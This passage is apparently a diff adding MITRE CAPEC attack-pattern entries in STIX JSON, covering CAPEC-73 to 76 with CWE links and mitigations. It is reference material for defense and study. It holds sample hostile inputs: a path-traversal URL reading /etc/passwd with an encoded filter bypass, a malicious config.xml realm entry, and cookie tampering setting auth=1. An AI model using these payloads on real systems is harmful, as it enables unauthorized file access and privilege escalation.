"attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", + "external_references": [ + { + "external_id": "CAPEC-73", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "modified": "2017-05-01T00:00:00.000Z", + "name": "User-Controlled Filename", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim must trust the name and locale of user controlled filenames." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename", + "Medium": "Deploying a malicious \"look-a-like\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a1e9288-e1cd-4661-bafa-f7a7f61e4a8c", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5da4f75-8c61-4081-b026-75f19ec8f8a1", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--15e190ea-a35c-4658-b69e-402f5cec7ad9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdccd87f-be5a-4567-acac-ded05ba22454", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Scan dynamically generated content against validation specification", + "id": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-73-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.\n State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.\n If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.\n ", + "external_references": [ + { + "external_id": "CAPEC-74", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1245", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1245.html" + }, + { + "external_id": "CWE-1253", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1253.html" + }, + { + "external_id": "CWE-1265", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1265.html" + }, + { + "external_id": "CWE-1271", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1271.html" + } + ], + "id": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulating State", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.\n An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state.

Experiment

  1. The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target.

Exploit

  1. Having determined how to manipulate the state, the adversary can perform illegitimate actions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_prerequisites": [ + "User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.", + "There is a faulty finite state machine in the hardware logic that can be exploited." + ], + "x_capec_resources_required": [ + "The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)." + ], + "x_capec_skills_required": { + "Medium": "The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", + "id": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", + "id": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d901ded9-6bd3-4d45-b338-71715e666e92", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", + "id": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2eab1469-094c-46e2-b78f-9a9d3108e08b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All possible states must be handled by hardware finite state machines.", + "id": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--390b777d-a7f5-499e-b105-e88b8b537dc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Backup copies of all configuration files", + "id": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b2f0cb4-7979-41a9-b066-52623efd9be1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Integrity monitoring for configuration files", + "id": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3b76047-8e3c-4ad6-890e-ee9b51ab15c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Enforce audit logging on code and configuration promotion procedures.", + "id": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f6c14a3-09ae-4833-b73c-17e14fa0ab03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", + "id": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f3ed3dd-3d16-41fa-9408-5e346f652fed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.", + "external_references": [ + { + "external_id": "CAPEC-76", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/76.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Web Input to File System Calls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user

    3. Techniques
    Spider web sites for all available links, entry points to the web site.
    Manually explore application and inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

    2. Techniques
    Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
    Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
    Inject context-appropriate malicious file system control syntax

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

    2. Techniques
    The attacker injects context-appropriate malicious file path to access the content of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
    The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Program must allow for user controlled variables to be applied directly to the filesystem" + ], + "x_capec_skills_required": { + "Low": "To identify file system entry point and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--418adbc1-d3a0-4e06-b39d-4a47ced3edbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure all input is validated, and does not contain file system commands", + "id": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 